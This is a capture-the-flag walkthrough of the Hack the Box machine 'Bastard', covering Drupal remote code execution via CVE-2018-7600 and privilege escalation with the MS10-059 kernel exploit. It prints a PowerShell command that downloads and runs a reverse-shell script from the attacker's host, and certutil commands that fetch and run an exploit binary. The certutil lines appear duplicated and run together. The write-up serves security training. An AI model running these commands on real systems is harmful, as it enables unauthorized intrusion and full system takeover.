Overall Summary
Bastard is a Windows machine from Hack the Box that is vulnerable to RCE through Drupal and privilege escalation can be accomplished by a kernel exploit because of the lack of patches. Overall, bastard is an easy machine and it can be exploited in more than one way.
Scanning and Enumeration
A full TCP nmap scan shows three ports open.
Exploitation
Just by looking for vulnerabilities and exploits for the 7.54 version I was able to come across
https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py , a python exploit that takes advantage of vulnerability that allows to execute arbitrary code because an issue with module configurations. The exploit can be executed by only providing a URL but it executes the command “id” by default, and since this a Windows machine we will have to issue the command as a parameter, this how I executed the script.
python3 drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9/
To get a reverse shell I’ll use
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1, a PowerShell reverse shell. I’ll first host the file on my attacking machine using python simpleHTTPServer, set up my netcat listener on port 443, and finally execute the exploit script with a command to download and execute the reverse shell. This is the command I’ll include in the execution of the script:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 443" http://10.10.10.9/
I was able to successfully get a PowerShell reverse shell.
Post-Exploitation
I used the output from the command and the tool “windows-exploit-suggester.py” and it returned different exploits.
By going down the list, I was able get the MS10-059 exploit working. The binary can be downloaded here
https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled . I uploaded this binary to the machine using certutil as follows:
certutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.execertutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.exe
certutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.execertutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.exe
./Chimichurri.exe 10.10.14.19 4321
After a few seconds I was able to successfully get a reverse shell as “nt authority\system”.